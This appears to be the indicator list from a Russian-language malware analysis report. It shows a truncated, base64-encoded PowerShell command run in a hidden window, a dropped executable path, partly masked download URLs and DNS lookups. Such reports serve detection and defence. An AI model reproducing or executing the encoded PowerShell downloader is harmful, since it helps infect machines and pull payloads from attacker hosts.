Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADQAMAB1AHcAYQBmAD0AKAAoACcASQByACcAKwAnADcAJwApACsAJwA3ACcAKwAoACcAcAAnACsAJwBzAHEAJwApACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AHUAcwBlAHIAcAByAE8AZgBpAE...
- %HOMEPATH%\auqiff0\mogjnr5\mobwuo6.exe
- http://dv##s.me/cgi-bin/s/
- http://fa##egat.eu/images/q/
- http://ez##a.fr/Accessoires/IKh/
- http://fi####nes.com.sg/wset-2-registration/6bsizM/
- http://fe#####service-stara.de/cgi-bin/x/
- http://fa#####nbande-ley.de/cgi-bin/tKX/
- http://ke##sch.de/adina/G/
- DNS ASK dv##s.me
- DNS ASK fa##egat.eu
- DNS ASK ez##a.fr
- DNS ASK fi####nes.com.sg
- DNS ASK fe#####service-stara.de
- DNS ASK fa#####nbande-ley.de
- DNS ASK ke##sch.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADQAMAB1AHcAYQBmAD0AKAAoACcASQByACcAKwAnADcAJwApACsAJwA3ACcAKwAoACcAcAAnACsAJwBzAHEAJwApACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AHUAcwBlAHIAcAByAE8AZgBpAE...' (со скрытым окном)